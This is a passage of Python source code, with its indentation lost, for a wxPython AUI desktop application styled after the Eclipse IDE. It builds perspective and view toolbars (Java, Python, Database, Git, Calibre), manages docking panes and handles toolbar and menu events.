# self._mgr.AddPane(self.sqlConsoleOutputPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="console_view.png")).
# Name("consoleOutput").Caption("Console").Dockable(True).Movable(True).LeftDockable(True).BestSize(wx.Size(500, 400)).MinSize(wx.Size(500, 400)).
# Bottom().Layer(0).Row(1).CloseButton(True).MaximizeButton(visible=True).MinimizeButton(visible=True).PinButton(visible=True).GripperTop())
# self._mgr.AddPane(self.constructHistoryPane(), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="sql.png")).
# Name("sqlLog").Caption("SQL Log").Dockable(True).BestSize(wx.Size(500, 400)).MinSize(wx.Size(500, 400)).
# Bottom().Layer(0).Row(1).CloseButton(True).MaximizeButton(visible=True).MinimizeButton(visible=True), target=self._mgr.GetPane("consoleOutput"))
self._mgr.GetPane("onWelcome").Show()
viewToolbar = self._mgr.GetPane("viewToolbar")
viewToolbar.Show()
self._mgr.GetPane("variableView").Show()
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
perspectiveToolbar.dock_row = viewToolbar.dock_row
perspectiveToolbar.Show()
self.perspective_default = self._mgr.SavePerspective()
perspective_all = self._mgr.SavePerspective()
self.setStyleToPanes()
all_panes = self._mgr.GetAllPanes()
# "commit" all changes made to FrameManager
self._mgr.Update()
# some more event
self.Bind(aui.EVT_AUI_PANE_CLOSE, self.OnPaneClose)
self.Bind(aui.EVT_AUINOTEBOOK_ALLOW_DND, self.OnAllowNotebookDnD)
self.Bind(aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnNotebookPageClose)
self.Bind(aui.EVT_AUI_PANE_FLOATING, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_FLOATED, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_DOCKING, self.OnFloatDock)
self.Bind(aui.EVT_AUI_PANE_DOCKED, self.OnFloatDock)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.Bind(wx.EVT_TIMER, self.TimerHandler)
self.timer = wx.Timer(self)
self.timer.Start(100)
#######################################################################################
def definePoint(self):
'''
right align toolbar
'''
managed_window = self._mgr.GetManagedWindow()
wnd_pos = managed_window.GetPosition()
(x, y) = wnd_size = managed_window.GetSize()
point = wx.Point(x - ((len(self.perspectiveList) - 1) * 32) + 5, 0)
return point
def OnPaneClose(self, event):
logger.debug("OnPaneClose")
# if event.pane.name == "test10":
# msg = "Are you sure you want to "
# if event.GetEventType() == aui.wxEVT_AUI_PANE_MINIMIZE:
# msg += "minimize "
# else:
# msg += "close/hide "
#
# res = wx.MessageBox(msg + "this pane?", "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnAllowNotebookDnD(self, event):
# for the purpose of this test application, explicitly
# allow all noteboko drag and drop events
event.Allow()
def OnNotebookPageClose(self, event):
logger.debug("OnNotebookPageClose")
ctrl = event.GetEventObject()
# if isinstance(ctrl.GetPage(event.GetSelection()), wx.html.HtmlWindow):
#
# res = wx.MessageBox("Are you sure you want to close/hide this notebook page?",
# "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnFloatDock(self, event):
paneLabel = event.pane.caption
etype = event.GetEventType()
strs = "Pane %s " % paneLabel
if etype == aui.wxEVT_AUI_PANE_FLOATING:
strs += "is about to be floated"
if event.pane.name == "test8" and self._veto_tree:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_FLOATED:
strs += "has been floated"
elif etype == aui.wxEVT_AUI_PANE_DOCKING:
strs += "is about to be docked"
if event.pane.name == "test11" and self._veto_text:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_DOCKED:
strs += "has been docked"
logger.debug(strs)
def __del__(self):
self.timer.Stop()
def OnClose(self, event):
self.timer.Stop()
self._mgr.UnInit()
event.Skip()
def TimerHandler(self, event):
try:
self.gauge.Pulse()
except:
self.timer.Stop()
#######################################################################################
def setStyleToPanes(self):
all_panes = self._mgr.GetAllPanes()
for pane in all_panes:
if isinstance(pane.window, aui.AuiNotebook):
nb = pane.window
nb.SetAGWWindowStyleFlag(self._notebook_style)
nb.SetArtProvider(aui.ChromeTabArt())
nb.Refresh()
nb.Update()
def constructPerspectiveToolBar(self):
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
tb1 = EclipseAuiToolbar(self)
self.perspectiveList = [
[ID_OTHER_PERSPECTIVE, "Open Perspective", 'new_persp.png', 'Open Perspective', None],
[],
[ID_JAVA_PERSPECTIVE, "Java", 'jperspective.png', 'Java', self.onPerspeciveSelection],
[ID_JAVA_EE_PERSPECTIVE, "Java EE", 'javaee_perspective.png', 'Java EE', self.onPerspeciveSelection],
[ID_DEBUG_PERSPECTIVE, "Debug", 'debug_persp.png', 'Debug', self.onPerspeciveSelection],
[ID_PYTHON_PERSPECTIVE, "Python", 'python_perspective.png', 'Python', self.onPerspeciveSelection],
[ID_DATABASE_PERSPECTIVE, "Database", 'database.png', 'Database', self.onPerspeciveSelection],
[ID_GIT_PERSPECTIVE, "Git", 'gitrepository.png', 'Git', self.onPerspeciveSelection],
[ID_RESOURCE_PERSPECTIVE, "Resources", 'resource_persp.png', 'Resources', self.onPerspeciveSelection],
[ID_CALIBRE_PERSPECTIVE, "Calibre", 'vl_16.png', 'Calibre', self.onPerspeciveSelection],
]
for perspectiveName in self.perspectiveList:
if len(perspectiveName) > 1:
toolBarItem = tb1.AddSimpleTool(perspectiveName[0], perspectiveName[1], self.fileOperations.getImageBitmap(imageName=perspectiveName[2]), short_help_string=perspectiveName[3])
if perspectiveName[4]:
self.Bind(wx.EVT_MENU, perspectiveName[4], id=perspectiveName[0])
if toolBarItem.label == 'Python':
self.selectedPerspectiveName = 'python'
tb1.SetPressedItem(toolBarItem)
else:
tb1.AddSeparator()
return tb1
# def onOpenPerspecitve(self, event):
# logger.debug('onOpenPerspecitve')
def selectItem(self, id=None):
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
item = perspectiveToolbar.window.getToolBarItemById(id)
perspectiveToolbar.window.EnableTool(item, True)
# def hideTools(self,viewToolbar.window, perspectiveName):
# pass
def viewToolBarByPerspective(self, perspectiveName):
viewToolbar = self._mgr.GetPane("viewToolbar")
# viewToolbar.window.DeleteTool(wx.ID_PREFERENCES)
self.constructViewToolBar(viewToolbar.window, perspectiveName)
s = viewToolbar.window.GetMinSize()
viewToolbar.BestSize(s)
allowedInstanceForProspective = [
# SqlConsoleOutputPanel,
py.shell.Shell,
PythonExplorerPanel,
DataSourcePanel,
CreatingJavaExplorerPanel,
FileBrowser,
]
if self.selectedPerspectiveName == 'database':
allowedInstanceForProspective.remove(DataSourcePanel)
elif self.selectedPerspectiveName == 'python':
allowedInstanceForProspective.remove(PythonExplorerPanel)
allowedInstanceForProspective.remove(py.shell.Shell)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'resource':
allowedInstanceForProspective.remove(FileBrowser)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'git':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
# for pane in self._mgr.GetAllPanes():
# if pane.window:
# for instance in allowedInstanceForProspective :
# if isinstance(pane.window, instance):
# self._mgr.ClosePane(pane)
# pane.window.Destroy()
# pane.DestroyOnClose(True)
if self.selectedPerspectiveName == 'database':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="databaseNaviagor", imageName="folder_database.png", captionName="Database Navigator", tabDirection=4)
elif self.selectedPerspectiveName == 'python':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="pythonShellView", imageName="shell.png", captionName="Python Shell", tabDirection=3)
self.openPanel(name="pythonPackageExplorer", imageName="package_explorer.png", captionName="Python Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'resource':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="fileExplorer", imageName="file_explorer.png", captionName="File Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'java':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="javaPackageExplorer", imageName="package_explorer.png", captionName="Java Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'calibre':
self.openPanel(name="bookBrowser", imageName="library-16.png", captionName="Book Browser", tabDirection=5)
self.openPanel(name="bookExplorer", imageName="package_explorer.png", captionName="Book Explorer", tabDirection=4)
# else:
# databaseNaviagorPane = self._mgr.GetPane("databaseNaviagor")
# databaseNaviagorPane.Show(False)
for pane in self._mgr.GetAllPanes():
if pane.window:
for instance in allowedInstanceForProspective :
if isinstance(pane.window, instance):
self._mgr.ClosePane(pane)
for pane in self._mgr.GetAllPanes():
if pane.window:
logger.debug(f'pane.window:{pane.window}, pane.window.IsShown():{pane.window.IsShown()}')
self.appendSubMenu(menuBar=self.GetMenuBar(), selectedPerspectiveName=self.selectedPerspectiveName)
self._mgr.Update()
print('viewToolBarByPerspective')
# def openPanel(self, name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3):
# # name="consoleOutput"
# pane = self._mgr.GetPane(name)
# panel = wx.Panel(self)
# if pane.window == None:
# if name == "consoleOutput":
# panel = SqlConsoleOutputPanel(self)
# elif name == "databaseNaviagor":
# panel = DataSourcePanel(self)
# elif name == "pythonPackageExplorer":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "projectExplorerView":
# panel = CreatingProjectExplorerPanel(self)
# elif name == "javaPackageExplorer":
# panel = CreatingJavaExplorerPanel(self)
# elif name == "pythonShellView":
# intro = f'{py.version.VERSION}'
# panel = py.shell.Shell(self, -1, introText=intro)
# elif name == "terminalView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "navigatorView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "tasksView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "fileExplorer":
# panel = FileBrowser(self, size=(500, 300))
# elif name == "bookExplorer":
# panel = BookExplorerPanel(self, size=(500, 300))
#
# self._mgr.addTabByWindow(panel, imageName=imageName, name=name , captionName=captionName, tabDirection=tabDirection)
# elif not pane.IsShown():
# pane.dock_direction = tabDirection
# window = pane.window
# if window:
# window.Show()
# pane.Show(True)
# # item.state=4
def onPerspeciveSelection(self, event):
logger.debug('onPerspeciveSelection')
# pub.sendMessage('perspectiveClicked', data=42, extra1='onJavaPerspective')
self.selectItem(event.Id)
if event.Id == ID_CALIBRE_PERSPECTIVE:
self.selectedPerspectiveName = 'calibre'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
if event.Id == ID_JAVA_PERSPECTIVE:
self.selectedPerspectiveName = 'java'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_JAVA_EE_PERSPECTIVE:
self.selectedPerspectiveName = 'java ee'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DEBUG_PERSPECTIVE:
self.selectedPerspectiveName = 'debug'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_PYTHON_PERSPECTIVE:
self.selectedPerspectiveName = 'python'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DATABASE_PERSPECTIVE:
self.selectedPerspectiveName = 'database'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_GIT_PERSPECTIVE:
self.selectedPerspectiveName = 'git'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_RESOURCE_PERSPECTIVE:
self.selectedPerspectiveName = 'resource'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
def constructViewToolBar(self, toobar=None, perspectiveName='python'):
# create some toolbars
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
if toobar == None:
self._ctrl = None
toobar = EclipseAuiToolbar(self)
# id, leble, imageName, lebel, method,setToolDropdown , list of perspective, initial state(disable/enable ), kind=wx.ITEM_CHECK
tools = [
(ID_NEW, "New", "new_con.png", 'New', self.onNewMenu, True, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SAVE, "Save (Ctrl+S)", "save.png", 'Save (Ctrl+S)', self.onSave, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_SAVE_ALL, "Save All (Ctrl+Shift+S)", "saveall_edit.png", 'Save All (Ctrl+Shift+S)', self.onSaveAll, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_BUILD_ALL, "Build All (Ctrl+B)", "build_exec.png", "Build All (Ctrl+B)", None, False, [ 'python', 'java', 'java ee'], True, wx.ITEM_NORMAL),
(ID_TERMINAL, "Open a Terminal", "linux_terminal.png", "Open a Terminal (Ctrl+Shift+Alt+T)", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SKIP_ALL_BREAKPOINTS, "Skip All Breakpoints (Ctrl+Alt+B)", "skip_brkp.png", "Skip All Breakpoints (Ctrl+Alt+B)", self.onSkipAllBreakPoints, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_CHECK),
(ID_NEW_JAVA_PACKAGE, "New Java Package", "newpack_wiz.png", "New Java Package", self.onOpenTerminal, False, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_NEW_JAVA_CLASS, "New Java Class", "newclass_wiz.png", "New Java Class", self.onOpenTerminal, True, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_RESUME_DEBUG, "Resume", "resume_co.png", "Resume", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_SUSPEND_DEBUG, "Suspend", "suspend_co.png", "Suspend", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_TERMNATE_DEBUG, "Terminate", "terminatedlaunch_obj.png", "Terminate", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_DISCONNECT_DEBUG, "Disconnect", "disconnect_co.png", "Disconnect", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_INTO_DEBUG, "Step Into", "stepinto_co.png", "Step Into", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_OVER_DEBUG, "Step Over", "stepover_co.png", "Step Over", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_RETURN_DEBUG, "Step Return", "stepreturn_co.png", "Step Return", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(),
(ID_DEBUG_AS_MENU, "Debug As...", "debug_exc.png", "Debug As...", self.onOpenTerminal, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_RUN_AS_MENU, "Run As...", "run_exc.png", "Run As...", self.onRunAsMenu, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_DYNAMIC_WEB_PROJECT, "Create a Dynamic Web Project", "create_dynamic_web_project.png", "Create a Dynamic Web Project", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_CREATE_NEW_SERVLET, "Create a New Servlet", "create_new_servlet.png", "Create a New Servlet", self.onRunAsMenu, True, ['java ee'], True, wx.ITEM_NORMAL),
(ID_OPEN_TYPE, "Open Type", "opentype.png", "Open Type", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_OPEN_TASK, "Open Task (Ctrl+F12)", "open_task.png", "Open Task (Ctrl+F12)", self.onOpenTask, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_SEARCH, "Search", "searchres.png", "Search", self.onOpenSearch, True, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_LAST_EDIT, "Last Edit Location", "last_edit_pos.png", "Last Edit Location", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_BACKWARD, "Back", "backward_nav.png", "Back", self.onOpenTerminal, True, ['python', 'java', 'debug'], True, wx.ITEM_NORMAL),
(ID_FORWARD, "Forward", "forward_nav.png", "Forward", self.onOpenTerminal, True, ['python', 'java', 'debug'], False, wx.ITEM_NORMAL),
(ID_newConnection, "New Connection", "connect.png", "New Connection", None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_openConnection, "Open Connection", "database_connect.png", 'Open Connection', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_newWorksheet, "Script", "script.png", 'Open a new script worksheet', None, False, ['database'], True, wx.ITEM_NORMAL),
(ID_ADD_BOOK, "Add Book", "add_book_16.png", 'Add Book', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_EDIT_BOOK_METADATA, "Edit Book metadata", "edit_book_16.png", 'Edit Book metadata', lambda e: self.onCalibre(e), True, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONVERT_BOOK, "Convert Book", "txn_config.png", 'Convert Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_REMOVE_BOOK, "Remove Book", "remove_books_16.png", 'Remove Book', lambda e: self.onCalibre(e), False, ['calibre'], True,wx.ITEM_NORMAL),
(ID_GET_BOOK, "Get Book", "store_16.png", 'Get Book', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_CONNECT_SHARE_BOOK, "Connect Share", "connect_share_on_16.png", 'Connect Share', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
(ID_RELOAD_BOOK, "Reload Books", "resultset_refresh.png", 'Reload Books', lambda e: self.onCalibre(e), False, ['calibre'], True, wx.ITEM_NORMAL),
# (wx.ID_PREFERENCES, "Preferences", "preference.png", 'Preference', None),
]
if len(self.toolbarItems) == 0:
for tool in tools:
if len(tool) == 0:
toobar.AddSeparator()
# elif perspectiveName in tool[6]:
else:
logger.debug(tool)
state = tool[7]
if tool[8] == wx.ITEM_RADIO:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
if tool[8] == wx.ITEM_CHECK:
toolItem = toobar.AddToggleTool(tool[0], self.fileOperations.getImageBitmap(imageName=tool[2]), wx.NullBitmap, toggle=True, short_help_string=tool[3])
toolItem.__setattr__('toggle', False)
toolItem.SetState(AUI_BUTTON_STATE_NORMAL)
toolItem.SetKind(wx.ITEM_CHECK)
elif tool[8] == wx.ITEM_NORMAL:
toolItem = toobar.AddSimpleTool(tool[0], tool[1], self.fileOperations.getImageBitmap(imageName=tool[2]), short_help_string=tool[3], kind=tool[8])
if state:
toolItem.state &= ~aui.AUI_BUTTON_STATE_DISABLED
else:
toolItem.state |= aui.AUI_BUTTON_STATE_DISABLED
if tool[4]:
self.Bind(wx.EVT_MENU, tool[4], tool[0])
if tool[5]:
toobar.SetToolDropDown(tool[0], tool[5])
self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=tool[0])
##############################################################
for tool in toobar._items:
self.toolbarItems[tool.GetId()] = tool
toobar._items.clear()
if self._ctrl:
self._ctrl.Hide()
for tool in tools:
if len(tool) != 0 and perspectiveName in tool[6]:
try:
if perspectiveName=='calibre':
toobar._items.append(self.toolbarItems[tool[0]])
else:
toobar._items.append(self.toolbarItems[tool[0]])
except Exception as e:
logger.error(e)
logger.error(tool[0], tool)
toobar.Realize()
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_RUN_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_DEBUG_AS_MENU)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_NEW_JAVA_CLASS)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_DYNAMIC_WEB_PROJECT)
# self.Bind(aui.EVT_AUITOOLBAR_TOOL_DROPDOWN, self.onRunDebugAsDropDown, id=ID_CREATE_NEW_SERVLET)
return toobar
def onCalibre(self, event):
# logger.debug(f'onCalibre {event.Id}')
viewToolbar = self._mgr.GetPane("viewToolbar").window
if event.Id == ID_RELOAD_BOOK:
logger.debug(f'ID_RELOAD_BOOK')
item=viewToolbar.FindTool(ID_RELOAD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
pub.sendMessage('reloadingDatabase', event=event)
if event.Id == ID_ADD_BOOK:
logger.debug(f'ID_ADD_BOOK')
item=viewToolbar.FindTool(ID_ADD_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_EDIT_BOOK_METADATA:
logger.debug(f'ID_EDIT_BOOK_METADATA')
item=viewToolbar.FindTool(ID_EDIT_BOOK_METADATA)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONVERT_BOOK:
logger.debug(f'ID_CONVERT_BOOK')
item=viewToolbar.FindTool(ID_CONVERT_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_REMOVE_BOOK:
logger.debug('ID_REMOVE_BOOK')
item=viewToolbar.FindTool(ID_REMOVE_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
# toolRemove.state =aui.AUI_BUTTON_STATE_NORMAL
# pub.sendMessage('ID_REMOVE_BOOK', event=ID_REMOVE_BOOK)
if event.Id == ID_GET_BOOK:
logger.debug(f'ID_GET_BOOK')
item=viewToolbar.FindTool(ID_GET_BOOK)
item.SetState(aui.AUI_BUTTON_STATE_NORMAL)
if event.Id == ID_CONNECT_SHARE_BOOK:
logger.debug(f'ID_CONNECT_SHARE_BOOK')
viewToolbar.Realize()
self._mgr.Update()
def onOpenTerminal(self, event):
logger.debug(f'onOpenTerminal {event.Id}')
def onSkipAllBreakPoints(self, event):
logger.debug(f'onSkipAllBreakPoints {event.Id}')
event.GetEventObject()._tip_item
# event.GetEventObject()._tip_item.__setattr__(toggle,False)
if event.GetEventObject()._tip_item.toggle:
# event.GetEventObject()._tip_item.SetBitmap(event.GetEventObject()._tip_item.GetBitmap())
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
else:
event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
event.GetEventObject()._tip_item.toggle = not event.GetEventObject()._tip_item.toggle
event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
# event.GetEventObject().GetToolToggled(event.GetEventObject()._tip_item.GetId())
event.GetEventObject().Refresh(True)
event.GetEventObject().Update()
# if event.GetEventObject()._tip_item.GetState() != AUI_BUTTON_STATE_NORMAL:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_NORMAL)
# else:
# event.GetEventObject()._tip_item.SetState(AUI_BUTTON_STATE_PRESSED)
def onOpenTask(self, event):
logger.debug('onOpenTask')
def onOpenSearch(self, event):
logger.debug('onOpenSearch')
def onRunAsMenu(self, event):
logger.debug('onRunAsMenu')
def onNewMenu(self, event):
logger.debug('onNewMenu')
newFileframe = NewFlowFrame(self, 'New', selectedPath="c:\work\python-project")
newFileframe.CenterOnScreen()
newFileframe.Show()
# def onSave(self, event):
# logger.debug('onSave1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
# def onSaveAll(self, event):
# logger.debug('onSaveAll1')
# viewToolbar = self._mgr.GetPane("viewToolbar")
# toolSaveAll=viewToolbar.window.FindTool(ID_SAVE_ALL)
# toolSaveAll.state =aui.AUI_BUTTON_STATE_DISABLED
# toolSave=viewToolbar.window.FindTool(ID_SAVE)
# toolSave.state =aui.AUI_BUTTON_STATE_DISABLED
# self._mgr.Update()
def onRunDebugAsDropDown(self, event):
if event.IsDropDownClicked():
tb = event.GetEventObject()
tb.SetToolSticky(event.GetId(), True)
baseList = list()
if event.Id == ID_RUN_AS_MENU:
baseList = [
[],
[ID_RUN_AS, 'Run As', None, None],
[ID_RUN_CONFIG, 'Run Configurations...', None, None],
[ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
]
elif event.Id == ID_DEBUG_AS_MENU:
baseList = [
[],
[ID_DEBUG_AS, 'Debug As', None, None],
[ID_DEBUG_CONFIG, 'Run Configurations...', None, None],
[ID_ORGANIZE_FAVORITES, 'Organize Favorites..', None, None],
]
elif event.Id == ID_ADD_BOOK:
baseList = [
[],
[wx.NewIdRef(), 'Add book from directory', "new_testcase.png", None],
]
elif event.Id == ID_NEW_JAVA_CLASS:
baseList = [
[],
[ID_JUNIT_TEST_CASE, 'Junit Test Case', "new_testcase.png", None],
[ID_CLASS, 'Class', 'newclass_wiz.png', None],
[ID_INTERFACE, 'Interface', 'newint_wiz.png', None],
[ID_ENUM, 'Enum', 'newenum_wiz.png', None],
[ID_ANNOTATION, 'Annotation', 'newannotation_wiz.png', None],
[ID_JAX_WS_HANDLER, 'JAX-WS Handler', 'jax_ws.png', None],
]
elif event.Id == ID_CREATE_DYNAMIC_WEB_PROJECT:
baseList = [
[],
[ID_DYNAMIC_WEB_PROJECT, 'Dynamic Web Project', 'create_dynamic_web_project.png', None],
[ID_WEB_FRAGMENT_PROJECT, 'Web Fragment Project', 'web_fragment_prj.png', None],
[ID_EJB_PROJECT, 'EJB Project', 'ejb_project.png', None],
[ID_ENTERPRISE_APP_PROJECT, 'Enterprise Application Project', 'enterprise_app.png', None],
[ID_APP_CLIENT_PROJECT, 'Application Client Project', 'app_client_prj.png', None],
[ID_CONNECTER_PROJECT, 'Connecter Project', 'connecter_prj.png', None],
[ID_UTILITY_PROJECT, 'Utility Project', 'java_lib_obj.png', None],
]
elif event.Id == ID_CREATE_NEW_SERVLET:
baseList = [
[],
[ID_SERVLET, 'Servlet', 'create_new_servlet.png', None],
[ID_FILTER, 'Filter', 'filter.png', None],
[ID_LISTENER, 'Listener', 'listener.png', None],
[ID_SESSION_BEAN, 'Session Bean', 'session_bean.png', None],
[ID_MESSAGE_DRIVEN_BEAN, 'Message-Driven Bean', 'message_driven_bean.png', None],
[ID_EJB_TIMER, 'EJB Timer', 'session_bean.png', None],
[ID_JPA_ENTITY, 'JPA entity', 'eclipseLink_dynamic_entity.png', None],
[ID_JPA_ORM_MAPPING_FILE, 'JPA ORM Mapping File', 'jpa_orm_mapping.png', None],
[ID_ECLIPSE_LINK_ORM_MAPPING_FILE, 'Eclipse Link ORM Mapping File', 'jpa_orm_mapping.png', None],
[ID_XDOCKLET_ENTERPRISE_JAVA_BEAN, 'XDocklet Enterprise Java Bean', 'xdoclet_ejb.png', None],
[ID_ECLIPSELINK_DYNAMIC_ENTITY, 'EclipseLink Dynamic Entity', 'eclipseLink_dynamic_entity.png', None],
]
elif event.Id == ID_NEW:
baseList = menuItemList[self.selectedPerspectiveName]
menuItemListx = {
self.selectedPerspectiveName: baseList
}
# create the popup menu
# menuPopup = wx.Menu()
menuPopup = self.createMenuByPerspective(menuItemList=menuItemListx, perspectiveName=self.selectedPerspectiveName)
# line up our menu with the button
rect = tb.GetToolRect(event.GetId())
pt = tb.ClientToScreen(rect.GetBottomLeft())
pt = self.ScreenToClient(pt)
self.PopupMenu(menuPopup, pt)
# make sure the button is "un-stuck"
tb.SetToolSticky(event.GetId(), False)
def createMenuByPerspective(self, menuItemList=None, perspectiveName='python'):
menuPopup = wx.Menu()
for menuItemName in menuItemList[perspectiveName]:
if len(menuItemName) > 1:
menuItem = wx.MenuItem(menuPopup, menuItemName[0], menuItemName[1])
if menuItemName[2]:
menuItem.SetBitmap(self.fileOperations.getImageBitmap(imageName=menuItemName[2]))
menuPopup.Append(menuItem)
self.Bind(wx.EVT_MENU, lambda e:self.onRightClickMenu(e), id=menuItemName[0])
else:
menuPopup.AppendSeparator()
return menuPopup
def creatingFileExplorer(self):
fileBrowserPanel = FileBrowser(self, size=(200, 300))
return fileBrowserPanel
def creatingTreeCtrl(self):
# Create a TreeCtrl
# treePanel = CreatingTreePanel(self)
treePanel = DataSourcePanel(self)
return treePanel
def getWorksheet(self, dataSourceTreeNode=None):
worksheetPanel = CreatingWorksheetWithToolbarPanel(self, -1, style=wx.CLIP_CHILDREN | wx.BORDER_NONE, dataSourceTreeNode=dataSourceTreeNode)
return worksheetPanel
def constructCenterPane(self):
worksheet = CreateWorksheetTabPanel(self)
# worksheet.addTab('Start Page')
return worksheet
def sqlConsoleOutputPane(self):
sqlConsoleOutputPanel = SqlConsoleOutputPanel(self)
return sqlConsoleOutputPanel
def constructHistoryPane(self):
historyGrid = HistoryGrid(self)
return historyGrid
def CreateSizeReportCtrl(self, width=80, height=80):
ctrl = SizeReportCtrl(self, -1, wx.DefaultPosition,
wx.Size(width, height), self._mgr)
return ctrl
class SizeReportCtrl(wx.PyControl):
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, mgr=None):
